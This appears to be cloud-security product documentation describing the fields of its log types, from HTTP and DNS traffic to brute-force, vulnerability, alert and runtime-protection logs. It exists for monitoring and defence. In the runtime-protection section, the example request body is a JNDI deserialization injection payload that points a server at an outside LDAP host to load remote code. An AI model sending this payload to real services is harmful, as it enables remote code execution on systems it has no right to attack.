Security Center:Log types and log fields of V2.0 log dictionaries

Field name

Description

Example

response_content_length

The length of the message body. Unit: bytes.

612

dst_ip

The IP address of the destination host.

39.105.XX.XX

dst_port

The port of the destination host.

80

host

The IP address or domain name of the destination host.

39.105.XX.XX

jump_location

The redirection address.

123

request_method

The HTTP request method.

GET

http_referer

The HTTP referer. The field contains the URL of the web page that is linked to the resource being requested.

www.example.com

request_datetime

The time when the request is initiated.

2024-08-01 06:59:28

status

The HTTP status code.

200

content_type

The type of the request content.

text/plain;charset=utf-8

response_content_type

The type of the response content.

text/plain; charset=utf-8

src_ip

The source IP address.

31.220.XX.XX

src_port

The source port.

59524

request_uri

The request URI.

/report

http_user_agent

The user agent that initiates the request.

okhttp/3.2.0

http_x_forward_for

The HTTP request header that records the originating IP address of the client.

31.220.XX.XX

Field name

Description

Example

additional

The additional field that is returned by the DNS server and records information such as the CNAME record, MX record, and PTR record.

N/A

additional_num

The number of additional records returned by the DNS server.

0

answer

The DNS answer returned by the DNS server, which indicates the resolution results. A DNS answer contains the IP address to which the requested domain name is resolved or other information such as the A record and the AAAA record.

example.com A IN 52 1.2.XX.XX

answer_num

The number of DNS answers.

1

authority

The authority field returned by the DNS server. An authority is the DNS server that manages and resolves the domain name. An authority field contains information about a DNS server that provides the DNS record for the requested domain name, such as the NS record.

NS IN 17597

authority_num

The number of authorities.

1

client_subnet

The subnet of the client.

59.152.XX.XX

dst_ip

The destination IP address.

106.55.XX.XX

dst_port

The destination port.

53

net_connect_dir

The direction of data transmission. Valid values:

• in: request to the DNS server

• out: response from the DNS server

out

qid

The ID of the query.

13551

query_name

The domain name that is queried.

example.com

query_type

The type of the query.

A

query_datetime

The time of the query.

2024-08-01 08:33:58

rcode

The response code returned by the DNS server, which indicates the DNS resolution result.

0

region

The ID of the source region. Valid values:

• 1: China (Beijing)

• 2: China (Qingdao)

• 3: China (Hangzhou)

• 4: China (Shanghai)

• 5: China (Shenzhen)

• 6: other regions

1

response_datetime

The response time of the DNS server.

2024-08-01 08:31:25

src_ip

The source IP address.

106.11.XX.XX

src_port

The source port.

22

Field name

Description

Example

asset_type

The type of the asset from which the logs are collected. Valid values:

• ECS: Elastic Compute Service (ECS) instance

• SLB: Server Load Balancer (SLB) instance

• NAT: NAT Gateway

ECS

dst_ip

The destination IP address.

119.96.XX.XX

dst_port

The destination port.

443

net_connect_dir

The direction of the session. The value is fixed as out.

• If the value of the proto field is tcp, the value of this field indicates an outbound request.

• If the value of the proto field is udp, the value of this field does not indicate the direction of the request and is for reference only.

out

l4_proto

The type of the protocol. Valid values:

• tcp

• udp

tcp

session_time

The time when the session starts.

2024-08-01 08:31:18

src_ip

The source IP address.

121.40.XX.XX

src_port

The source port.

53602

Field name

Description

Example

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

sas_group_name

The asset group to which the server belongs in Security Center.

default

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

src_ip

The IP address that is used to log on to the server.

221.11.XX.XX

dst_port

The port that is used to log on to the server.

22

login_type

The logon type. Valid values include the following values:

• SSHLOGIN and SSH: SSH logon

• RDPLOGIN: remote desktop logon

• IPCLOGIN: IPC connection logon

SSH

username

The username that is used for logon.

admin

login_count

The number of logon attempts.

The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the login_count field is 3, 3 logon attempts were made within 1 minute.

3

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

cmd_chain

The process chain.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

The index of the process chain. You can use an index to search for a process chain.

B184

container_hostname

The name of the server in the container.

nginx-ingress-controller-765f67fd4d-****

container_id

The container ID.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

The image ID.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

The image name.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

The name of the container.

nginx-ingress-****

container_pid

The ID of the process in the container.

0

net_connect_dir

The direction of the network connection. Valid values:

• in

• out

in

dst_ip

The destination IP address.

• If the value of dir is out, the value of this field is the IP address of the peer host.

• If the value of dir is in, the value of this field is the IP address of your host.

192.168.XX.XX

dst_port

The destination port.

443

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

parent_proc_name

The name of the parent process file.

/usr/bin/bash

pid

The ID of the process.

14275

ppid

The parent process ID.

14268

proc_name

The name of the process.

nginx

proc_path

The path to the process.

/usr/local/nginx/sbin/nginx

proc_start_time

The time when the process was started.

N/A

connection_type

The protocol. Valid values:

• tcp

• raw, which indicates raw socket

tcp

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

srv_comm

The command name associated with the parent process of the parent process.

containerd-shim

status

The status of the network connection. Valid values:

• 1: The connection is closed.

• 2: The connection is to be established.

• 3: The SYN packet is sent.

• 4: The SYN packet is received.

• 5: The connection is established.

• 6: The connection is waiting to be closed.

• 7: The connection is being closed.

• 8: The local endpoint is waiting for an acknowledgment of the connection termination request from the peer endpoint.

• 9: The local endpoint is waiting for a connection termination request from the peer endpoint after it has received the acknowledgment from the peer endpoint.

• 10: The local endpoint is waiting for enough time to elapse to ensure that the peer endpoint receives the acknowledgment from the local endpoint.

• 11: The TCB for the connection is deleted.

5

type

The type of the real-time network connection. Valid values:

• connect: TCP connection initiated

• accept: TCP connection received

• listen: port listening

listen

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server that is under a brute-force attack.

192.168.XX.XX

sas_group_name

The asset group to which the server belongs in Security Center.

default

uuid

The UUID of the server that is under a brute-force attack.

5d83b26b-b7ca-4a0a-9267-12*****

login_count

The number of failed logon attempts.

The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the warn_count field is 3, three logon attempts were made within 1 minute.

3

src_ip

The source IP address.

47.92.XX.XX

dst_port

The logon port.

22

login_type

The logon type. Valid values:

• SSHLOGIN and SSH: SSH logon

• RDPLOGIN: remote desktop logon

• IPCLOGIN: IPC connection logon

SSH

username

The username that is used for logon.

user

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

account_expire

The date when the account expires. The value never indicates that the account never expires.

never

domain

The domain or directory to which the account belongs. The value N/A indicates that the account does not belong to a domain.

N/A

groups

The group to which the account belongs. The value N/A indicates that the account does not belong to a group.

["nscd"]

home_dir

The home directory, which is the default directory to store and manage files in the system.

/Users/abc

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

last_chg

The date when the password was last changed.

2022-11-29

last_logon

The date and time of the last logon that is initiated by using the account. The value N/A indicates that the account has not been used for logons.

2023-08-18 09:21:21

login_ip

The IP address from which the last remote logon was initiated by using the account. The value N/A indicates that the account has not been used for logons.

192.168.XX.XX

passwd_expire

The date when the password expires. The value never indicates that the password never expires.

2024-08-24

perm

Indicates whether the account has root permissions. Valid values:

• 0: no

• 1: yes

0

sas_group_name

The asset group to which the server belongs in Security Center.

default

shell

The Linux shell command.

/sbin/nologin

status

The status of the account. Valid values:

• 0: Logons from the account are not allowed.

• 1: Logons from the account are allowed.

0

tty

The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons.

N/A

username

The name of the user.

nscd

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

warn_time

The date when you are notified of expiring passwords. The value never indicates that no notifications are sent.

2024-08-20

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

net_connect_dir

The direction of the network connection. Valid values:

• in

• out

in

dst_ip

The destination IP address.

• If the value of dir is out, the value of this field is the IP address of the peer host.

• If the value of dir is in, the value of this field is the IP address of your host.

192.168.XX.XX

dst_port

The destination port.

443

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

pid

The ID of the process.

682

proc_name

The name of the process.

sshd

connection_type

The protocol. Valid values:

• tcp4: TCP connections over IPv4 addresses

• tcp6: TCP connections over IPv6 addresses

tcp4

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address.

100.127.XX.XX

src_port

The source port.

41897

status

The status of the network connection. Valid values:

• 1: The connection is closed.

• 2: The connection is to be established.

• 3: The SYN packet is sent.

• 4: The SYN packet is received.

• 5: The connection is established.

• 6: The connection is waiting to be closed.

• 7: The connection is being closed.

• 8: The local endpoint is waiting for an acknowledgment of the connection termination request from the peer endpoint.

• 9: The local endpoint is waiting for a connection termination request from the peer endpoint after it has received the acknowledgment from the peer endpoint.

• 10: The local endpoint is waiting for enough time to elapse to ensure that the peer endpoint receives the acknowledgment from the local endpoint.

• 11: The TCB for the connection is deleted.

5

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

cmdline

The complete command to start the process.

/usr/local/share/assist-daemon/assist_daemon

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server.

192.168.XX.XX

md5

The MD5 hash value of the binary file.

1086e731640751c9802c19a7f53a64f5

proc_name

The name of the process file.

assist_daemon

proc_path

The full path to the process file.

/usr/local/share/assist-daemon/assist_daemon

pid

The ID of the process.

1692

pname

The name of the parent process file.

systemd

sas_group_name

The asset group to which the server belongs in Security Center.

default

proc_start_time

The time when the process started. This is a built-in field.

2023-08-18 20:00:12

uid

The ID of the user who started the process.

101

username

The name of the user who started the process.

root

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

domain

The domain name that is included in the DNS request.

example.aliyundoc.com

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

host_ip

The IP address of the server that initiates the DNS request.

192.168.XX.XX

pid

The ID of the process that initiates the DNS request.

3544

ppid

The ID of the parent process that initiates the DNS request.

3408

cmd_chain

The chain of the process that initiates the DNS request.

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

The command line of the process that initiates the DNS request.

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

The path to the process that initiates the DNS request.

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

The asset group to which the server belongs in Security Center.

default

time

The time when the DNS request is captured. In most cases, the value is the point in time when the DNS request is initiated.

2023-08-17 20:05:04

uuid

The UUID of the server that initiates the DNS request.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

host_ip

The IP address of the server.

192.168.XX.XX

agent_version

The version of the Security Center agent.

aegis_11_91

last_login

The timestamp of the last logon. Unit: milliseconds.

1716444387617

platform

The type of the operating system. Valid values:

• windows

• linux

linux

region_id

The ID of the region in which the server resides.

cn-beijing

status

The status of the Security Center agent. Valid values:

• online

• offline

online

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

vul_alias_name

The alias of the vulnerability.

CESA-2023:1335: openssl Security Update

risk_level

The risk level. Valid values:

• asap: high

• later: medium

• nntf: low

later

extend_content

The extended information about the vulnerability.

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the host.

39.104.XX.XX

intranet_ip

The private IP address of the host.

192.168.XX.XX

instance_name

The name of the host.

hhht-linux-***

vul_name

The name of the vulnerability.

centos:7:cesa-2023:1335

operation

The operation on the vulnerability. Valid values:

• new

• verify

• fix

new

status

The status information. Valid values:

• 1: unfixed

• 2: fix failed

• 3: rollback failed

• 4: fixing

• 5: rolling back

• 6: verifying

• 7: fixed

• 8: fixed and pending restart

• 9: rolled back

• 10: ignored

• 11: rolled back and pending restart

• 12: no longer exists

• 13: expired

1

tag

The tag that is added to the vulnerability. Valid values:

• oval: Linux software vulnerability

• system: Windows system vulnerability

• cms: Web-CMS vulnerability

  Note

  A random string indicates other types of vulnerabilities.

oval

type

The type of the vulnerability. Valid values:

• sys: Windows system vulnerability

• cve: Linux software vulnerability

• cms: Web-CMS vulnerability

• emg: urgent vulnerability

sys

uuid

The UUID of the server.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

check_item_name

The name of the check item.

Set the shortest interval between password changes

check_item_level

The risk level of the baseline. Valid values:

• high

• medium

• low

medium

check_type

The type of the check item.

Identity authentication

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

risk_level

The severity of the risk item. Valid values:

• high

• medium

• low

medium

operation

The operation. Valid values:

• new

• verity

new

risk_name

The name of the risk item.

Password compliance check

sas_group_name

The server group to which the server belongs in Security Center. The risk item is detected on the server.

default

status

The status information. Valid values:

• 1: unfixed

• 2: fix failed

• 3: rollback failed

• 4: fixing

• 5: rolling back

• 6: verifying

• 7: fixed

• 8: fixed and pending restart

• 9: rolled back

• 10: ignored

• 11: rolled back and pending restart

• 12: no longer exists

• 13: expired

1

sub_type_alias_name

The alias of the subtype in Chinese.

Internationally Agreed Best Practices for Security - Ubuntu 16/18/20/22 Security Baseline Check

sub_type_name

The name of the subtype. For more information about baseline subtypes, see Baseline types and subtypes.

hc_ubuntu16_cis_rules

type_alias_name

The alias of the check type in Chinese.

Internationally Agreed Best Practices for Security

type_name

The type of the baseline. For more information about baseline types, see Baseline types and subtypes.

cis

uuid

The UUID of the server on which the risk item is detected.

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

data_source

The data source. Valid values:

• aegis_suspicious_event: host exceptions

• aegis_suspicious_file_v2: webshells

• aegis_login_log: unusual logons

• honeypot: alert events generated by cloud honeypots

• object_scan: file detection exceptions

• security_event: Security Center exceptions

• sas_ak_leak: AccessKey pair leaks

aegis_login_log

detail

The details of the alert.

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Logon to an ECS instance by using an unusual account","status":0}

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the host.

39.104.XX.XX

intranet_ip

The private IP address of the host.

192.168.XX.XX

level

The risk level of the alert. Valid values:

• serious

• suspicious

• remind

suspicious

name

The name of the alert.

Unusual logon - Logon to an ECS instance by using an unusual account

operation

The operation. Valid values:

• new

• dealing

• update

new

status

The status of the alert. Valid values:

• 0: all

• 1: pending handling

• 2: ignored

• 4: confirmed

• 8: marked as a false positive

• 16: being handled

• 32: handled

• 64: expired

• 128: deleted

• 512: being automatically blocked

• 513: automatically blocked

1

unique_info

The UUID of the alert.

2536dd765f804916a1fa3b9516b5****

uuid

The UUID of the server on which the alert is generated.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

check_id

The ID of the check item. You can call the ListCheckResult operation to query the IDs of check items. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services.

11

check_item_name

The name of the check item.

Back-to-origin settings

instance_id

The ID of the instance.

i-2zeg4zldn8zypsfg****

instance_name

The name of the instance.

lsm

instance_result

The impacts of risks. The value is a JSON string.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

The subtype of the instance. Valid values:

• If the type of the instance is ECS, the following valid values are supported:

  • INSTANCE

  • DISK

  • SECURITY_GROUP

• If the type of the instance is Container Registry, the following valid values are supported:

  • REPOSITORY_ENTERPRISE

  • REPOSITORY_PERSON

• If the type of the instance is Resource Access Management (RAM), the following valid values are supported:

  • ALIAS

  • USER

  • POLICY

  • GROUP

• If the type of the instance is Web Application Firewall (WAF), the value is fixed as DOMAIN.

• If the type of the instance is other values, the value is fixed as INSTANCE.

INSTANCE

instance_type

The type of the instance. Valid values:

• ECS

• SLB

• RDS: ApsaraDB RDS

• MONGODB: ApsaraDB for MongoDB

• KVSTORE: ApsaraDB for Redis

• ACR: Container Registry

• CSK: Container Service for Kubernetes (ACK)

• VPC: Virtual Private Cloud (VPC)

• ACTIONTRAIL: ActionTrail

• CDN: Alibaba Cloud CDN (CDN)

• CAS: Certificate Management Service (formerly SSL Certificates Service)

• RDC: Apsara Devops

• RAM

• DDOS: Anti-DDoS Proxy

• WAF

• OSS

• POLARDB: PolarDB

• POSTGRESQL: ApsaraDB RDS for PostgreSQL

• MSE: Microservices Engine (MSE)

• NAS: File Storage NAS (NAS)

• SDDP: Sensitive Data Discovery and Protection (SDDP)

• EIP: Elastic IP Address (EIP)

ECS

region_id

The region ID of the instance.

cn-hangzhou

requirement_id

The requirement item ID. You can call the ListCheckStandard operation to query the IDs of requirement items. The operation is used to query the standards of configuration checks.

5

risk_level

The risk level. Valid values:

• LOW

• MEDIUM

• HIGH

MEDIUM

section_id

The section ID. You can call the ListCheckResult operation to query section IDs.

1

standard_id

The standard ID. You can call the ListCheckStandard operation to query standard IDs.

1

status

The status of the check item. Valid values:

• NOT_CHECK: The check item is not checked.

• CHECKING: The check item is being checked.

• PASS: The check item passed the check.

• NOT_PASS: The check item failed the check.

• WHITELIST: The check item is added to the whitelist.

PASS

vendor

The cloud service provider. The value is fixed as ALIYUN.

ALIYUN

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

cmd

The command line of the attacked process.

nginx: master process nginx

cur_time

The time when the attack event occurred.

2023-09-14 09:21:59

decode_payload

The decoded hexadecimal payload.

POST /Services/FileService/UserFiles/

dst_ip

The IP address of the attacked asset.

172.16.XX.XX

dst_port

The port of the attacked asset.

80

func

The type of the blocked event. Valid values: Valid values:

• payload: indicates that an event is blocked when malicious data or instructions are detected.

• tuple: indicates that an event is blocked when malicious IP addresses are detected.

payload

rule_type

The type of the rule that is used in the blocked event. Valid values:

• alinet_payload: indicates a payload defense rule that is specified in Security Center.

• alinet_tuple: indicates a tuple defense rule that is specified in Security Center.

alinet_payload

instance_id

The instance ID of the attacked asset.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the attacked asset.

39.104.XX.XX

intranet_ip

The private IP address of the attacked asset.

192.168.XX.XX

final_action

The defense action. The value is fixed as block. The value indicates that the attack is blocked.

block

payload

The hexadecimal payload.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

The ID of the attacked process.

7107

platform

The type of the operating system of the attacked asset. Valid values:

• win

• linux

linux

proc_path

The path to the attacked process.

/usr/sbin/nginx

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address of the attack.

106.11.XX.XX

src_port

The source port of the attack.

29575

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

app_dir

The directory in which the application is stored.

/usr/local/aegis/rasp/apps/1111

app_id

The ID of the application.

6492a391fc9b4e2aad94****

app_name

The name of the application.

test

confidence_level

The confidence level of the detection algorithm. Valid values:

• high

• medium

• low

low

request_body

The information about the request body.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

The length of the request body.

112

data

The hook.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

The information about the request header.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

The name of the host or network device.

testhostname

host_ip

The private IP address of the host.

172.16.XX.XX

is_cliped

Indicates whether the log is truncated due to an excessive length. Valid values:

• true

• false

false

jdk_version

The JDK version.

1.8.0_292

message

The description of the alert.

Unsafe class serial.

request_method

The request method.

Post

platform

The type of the operating system.

Linux

arch

The architecture of the operating system.

amd64

kernel_version

The kernel version of the operating system.

3.10.0-1160.59.1.el7.x86_64

param

The request parameter. In most cases, the parameter is in one of the following formats:

• GET parameter

• application/x-www-form-urlencoded

{"url":["http://127.0.0.1.xip.io"]}

payload

The attack payload.

bash -c kill -0 -- -'31098'

payload_length

The length of the attack payload.

27

rasp_id

The ID of the Runtime Application Self Protection (RASP) agent.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

The version of the RASP agent.

0.8.5

src_ip

The IP address from which the request is initiated.

172.0.XX.XX

final_action

The handling result of the alert. Valid values:

• block

• monitor

block

rule_action

The alert handling action that is specified in the application protection rule. Valid values:

• block

• monitor

block

risk_level

The risk level. Valid values:

• high

• medium

• low

high

stacktrace

The stack information.

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

The time when the alert was generated.

2023-10-09 15:19:15

timestamp

The timestamp when the alert was generated. Unit: milliseconds.

1696835955070

type

The type of the vulnerability. Valid values:

• attach: malicious Attach API

• beans: malicious beans binding

• classloader: malicious class loading

• dangerous_protocol: usage of vulnerable protocols

• dns: malicious DNS query

• engine: engine injection

• expression: expression injection

• file: malicious file read and write

• file_delete: arbitrary file deletion

• file_list: directory traversal

• file_read: arbitrary file read

• file_upload: malicious file upload

• jndi: Java Naming and Directory Interface (JNDI) injection

• jni: Java Native Interface (JNI) injection

• jstl: JavaServer Pages Standard Tag Library (JSTL) arbitrary file inclusion

• memory_shell: in-memory webshell injection

• rce: command execution

• read_object: deserialization attack

• reflect: malicious reflection call

• sql: SQL injection

• ssrf: malicious external connection

• thread_inject: thread injection

• xxe: XML external entity (XXE) attack

rce

url

The request URL.

http://127.0.0.1:999/xxx

rasp_attack_uuid

The UUID of the vulnerability.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

The UUID of the host.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

The public IP address of the host.

1.2.XX.XX

intranet_ip

The private IP address of the host.

172.16.XX.XX

sas_group_name

The group to which the server belongs in Security Center.

Group 1

instance_id

The instance ID of the host.

i-wz995eivg28f1m**

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214

Field name

Description

Example

bucket_name

The name of the OSS bucket.

***-test

event_id

The ID of the alert.

802210

event_name

The name of the alert.

Mining program

md5

The MD5 hash value of the file.

6bc2bc******53d409b1

sha256

The SHA-256 hash value of the file.

f038f9525******7772981e87f85

result

The detection result. Valid values:

• 0: No malicious file is detected.

• 1: Malicious files are detected.

0

file_path

The path to the file.

test.zip/bin_test

etag

The ID of the OSS object.

6BC2B******853D409B1

risk_level

The risk level. Valid values:

• serious

• suspicious

• remind

remind

source

The check method.

• OSS: Objects in OSS buckets are checked in the Security Center console.

• API: SDK for Java or Python is used to detect malicious files.

OSS

parent_md5

The MD5 hash value of the parent file or the compressed package file.

3d0f8045bb9******

parent_sha256

The SHA-256 hash value of the parent file or the compressed package file.

69b643d6******a3fb859fa

parent_file_path

The name of the parent file or the compressed package file.

test.zip

start_time

The start timestamp, which indicates the time when the event occurs. Unit: seconds.

1719472214